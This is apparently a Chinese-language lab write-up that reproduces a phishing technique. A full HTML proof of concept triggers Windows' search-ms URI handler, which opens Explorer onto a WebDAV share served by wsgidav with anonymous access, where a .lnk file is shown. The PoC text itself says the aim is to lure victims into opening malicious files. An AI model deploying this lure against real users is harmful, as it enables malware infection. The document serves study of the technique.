0x00 實驗環境
靶場:全新的windows筆記本,kali
0x01 實驗前提
(1)學習國外大佬的文章
(2)動手實戰
文章一分鐘,復現半小時
0x02 實驗步驟
apt-get install python3-wsgidav
WSGI是什麼?
WSGI,全稱 Web Server Gateway Interface,或者 Python Web Server Gateway Interface ,是爲 Python 語言定義的 Web 服務器和 Web 應用程序或框架之間的一種簡單而通用的接口。自從 WSGI 被開發出來以後,許多其它語言中也出現了類似接口。
WebDAV 是什麼?
WebDAV(Web Dub)是一種技術和功能,可以使用Web服務器進行文件共享和編輯,目前可用於許多租賃服務器計劃,還有用戶自己設置VPS等方法。
WebDAV類似於當前流行的Google Drive等在線存儲服務,雲上的多個用戶可以相對安全地進行文件共享和編輯。
<html> <head> <title>search-ms</title> <script> window.location.href = 'search-ms:query=lnk&crumb=location:\\\\192.168.31.242@5000\\dec&displayname=Hello, is it me you\'re looking for?'; </script> </head> <body> <center> PoC triggering Microsoft's <b>search-ms</b> URI handler to open up Explorer previewing attacker's WebDAV contents.</br> This is to lure victims into opening malicious files which could have led to their computers infection.<br/> </center> </body> </html>
(4)開啓服務:在當前路徑下開啓5000端口。設置認證爲匿名認證:
wsgidav --port=5000 --host=0.0.0.0 --root=./ --auth=anonymous
(6)當我們去點擊打開的時候。可以看到頁面會顯示一個1.lnk文件,因爲這個文件我們沒做任何處理,所以是沒有圖標的。
0x03 一些思考
(1)以前說上傳文件不能getshell的場景,用處都不大,現在發現只是因爲自己瞭解的知識太少了;
(2)有的電腦運行html並不能成功打開資源管理器,可能是谷歌版本太低導致;
(3)多學習外國佬的文章,會漲很多姿勢。